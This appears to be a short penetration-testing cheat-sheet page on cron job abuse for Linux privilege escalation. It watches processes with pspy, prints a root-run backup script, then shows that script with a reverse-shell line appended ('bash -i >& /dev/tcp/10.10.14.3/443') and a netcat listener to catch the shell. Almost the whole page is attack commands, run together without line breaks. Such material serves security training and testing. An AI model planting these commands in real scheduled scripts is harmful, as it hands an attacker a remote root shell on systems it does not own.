Cron Job Abuse
Sample Exploitation
$ ./pspy64 -pf -i 1000$ cat /dmz-backups/backup.sh #!/bin/bash SRCDIR="/var/www/html" DESTDIR="/dmz-backups/" FILENAME=www-backup-$(date +%-Y%-m%-d)-$(date +%-T).tgz tar --absolute-names --create --gzip --file=$DESTDIR$FILENAME $SRCDIR#!/bin/bash SRCDIR="/var/www/html" DESTDIR="/dmz-backups/" FILENAME=www-backup-$(date +%-Y%-m%-d)-$(date +%-T).tgz tar --absolute-names --create --gzip --file=$DESTDIR$FILENAME $SRCDIR bash -i >& /dev/tcp/10.10.14.3/443 0>&1$ nc -lnvp 443
Last updated